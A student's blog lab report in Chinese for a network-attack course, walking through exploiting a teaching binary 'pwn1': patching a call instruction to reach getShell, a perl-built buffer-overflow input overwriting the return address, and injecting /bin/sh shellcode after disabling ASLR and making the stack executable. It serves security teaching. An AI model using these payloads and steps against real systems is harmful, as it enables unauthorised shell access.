2019-2020 20175122邱昕《网络对抗技术》Exp1 PC平台逆向破解

实践内容

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

除了main和foo,该可执行文件中还包含一个getShell代码片段,正常运行情况下这个getshell不会执行,我们的目的就是想办法运行这个代码片段

三个实践内容如下:

  • 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 注入一个自己制作的shellcode并运行这段shellcode。

实践步骤

 

任务一 直接修改程序机器指令,改变程序执行流程

思路:修改机器指令强行跳转地址

 

1.下载pwn1兵进行反汇编

第一列为内存地址,第二列为机器指令,第三列为汇编指令。

 

我们找到了执行跳转的语句main第四行call 8048491<foo>,它对应的机器指令为e8 d7ffffff,内存地址为80484b5

e8就是call指令的机器指令,即跳转。

d7ffffff就是要跳转的地址

如图

此时eip的地址为8048ba,执行的话会执行eip d7ffffff指令

我们想让他调用getshell,修改d7ffffff为getshell-80484ba对应的补码

经过计算得到c3 ffffff

 2.对pwn1文件进行修改

打开pwn1文件

 

乱码

esc后输入:%!xxd -r

输入/e8 d7找到位置

将d7改为c3再转换为原格式保存退出

再次反汇编验证如图已经将d7改为了c3,且是getshell函数

运行pwn1且成功运行shell

任务二 通过构造输入参数,造成BOF攻击,改变程序执行流

思路

先安装gdb,后运行gdb pwn1,输入r进行调试

输入111111222222333333444444555555666666观察寄存器

显示eip            0x36363636          0x36363636

即6666,所以eip寄存器的值是保存程序下一步所要执行指令的地址,此处我们可以看出本来应返回到foo函数的返回地址已被"6666"覆盖

我们再次输入字符串1111111122222222333333334444444412345678

进行观察

由于eip是0x34333231即1234,所以就要把字符串中会覆盖EIP的字符替换成getShell的地址

将getShell的地址0x0804847d把后面的数值替换,即是输入11111111222222223333333344444444\x7d\x84\x04\x08

因为我们没法通过键盘输入\x7d\x84\x04\x08的16进制值,所以先要生成包括这样字符串的一个文件。\x0a表示回车,

如果没有的话,在程序运行时就需要手工按一下回车键。于是我们通过输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input来生成这样的文件。

通过管道符号    |    再将input文件作为pwn1的输入。

任务三 注入Shellcode并执行

准备工作

准备shellcode指令

使用老师给的指令\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

安装软件包兵进行一系列准备工作

root@20175122:/home/kali/Desktop# execstack -s pwn1     设置堆栈可执行
root@20175122:/home/kali/Desktop# execstack -q pwn1     查询文件的堆栈是否可执行
X pwn1
root@20175122:/home/kali/Desktop# more /proc/sys/kernel/randomize_va_space    查看内存地址随机化的参数
2
root@20175122:/home/kali/Desktop# echo "0" > /proc/sys/kernel/randomize_va_space     关闭地址随机化
root@20175122:/home/kali/Desktop# more /proc/sys/kernel/randomize_va_space
0

进行攻击

首先我们还是要生成一个文件来让pwn1完成输入

使用perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

将该文件导入pwn1并运行

打开另一个终端进行调试

利用ps -ef | grep pwn1发现进程号为2896

输入gdb进入调试界面,然后输入attach 2896调试这个进程

输入命令disassemble foo查看ret的进程值为0x080484ae

输入命令0x080484ae0x080484ae处设置断点,查看注入buf的内存地址。

在第一个终端回车,在第二个终端输入c

输入指令info r esp查看查看栈顶指针所在的位置,并查看改地址存放的数据

因为结构为anything+retaddr+nops+shellcode。

所以0xffffd6ec存放的是01020304,也就是返回地址。

因此,修改input_shellcode文件中的代码:

perl -e 'print "A" x 32;print "\xf4\xd6\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

并再次利用  |   输入,就能成功攻击了

 

 

四、实验感想

网络对抗的第一次实验,我没有学习过有关java或linux的课程,做起来有些吃力,但在查阅资料和同学的帮助下,还是成功完成了本次实验,知道了很多以前我从来不知道的知识,包括16进制需要创建文件来导入,栈的更多知识,以前在学汇编的时候明白了溢出攻击的原理,今天成功的自己做了出来,成就感很强。另外,对着老师或者同学学长学姐的博客是不能成功做出本次实验的,需要理解,包括进程编号,内存地址,每台电脑的不一样,因此,每台电脑需要创建的注入攻击所用的文件也不一样。

在接下来的学习中我将逐渐补全linux的知识和操作,争取早日跟上大家的脚步

 

五、课后问题

什么是漏洞?漏洞有什么危害?

本次实验的漏洞实在软件的实现上存在缺陷,可以使攻击者在未授权的情况下访问或者破坏系统。

漏洞的出现能使一些本来能正常运行的软硬件出现使用的问题,影响到人们正常的工作学习。

 

posted @ 2020-03-08 20:31  20175122邱昕  阅读(152)  评论(1编辑  收藏